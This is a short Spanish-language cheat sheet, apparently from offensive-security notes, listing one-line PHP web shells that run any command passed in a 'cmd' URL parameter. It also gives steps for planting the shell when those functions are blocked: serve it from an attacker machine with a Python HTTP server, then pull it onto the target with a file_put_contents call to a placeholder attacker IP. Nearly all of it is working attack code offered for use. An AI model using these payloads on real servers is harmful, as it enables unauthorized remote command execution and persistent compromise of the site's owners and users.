# Webshell

## Webshell

### PHP

```
<?php echo system($_GET['cmd']); ?>
<?php echo exec($_GET['cmd']); ?>
<?php echo passthru($_GET['cmd']); ?>
<?php echo shell_exec($_GET['cmd']); ?>
```

Si todas las funciones anteriores están bloqueadas, se puede crear un fichero PHP desde un servidor remoto, y en este incluir nuestro código malicioso:

1. &#x20;Crear un fichero "s.php" con alguno de los valores anteriores, por ejemplo:

```
<?php echo system($_GET['cmd']); ?>
```

2. Poner el puerto 80 a la escucha:

```
python3 -m http.server 80
```

3. Modificar el siguiente comando con los valores de la IP del servidor donde se aloja el fichero PHP y el nombre con el que queremos almacenar el fichero en el servidor:

```
<?php file_put_contents('s.php',file_get_contents('http://<IP atacante>:80/s.php')) ?>
```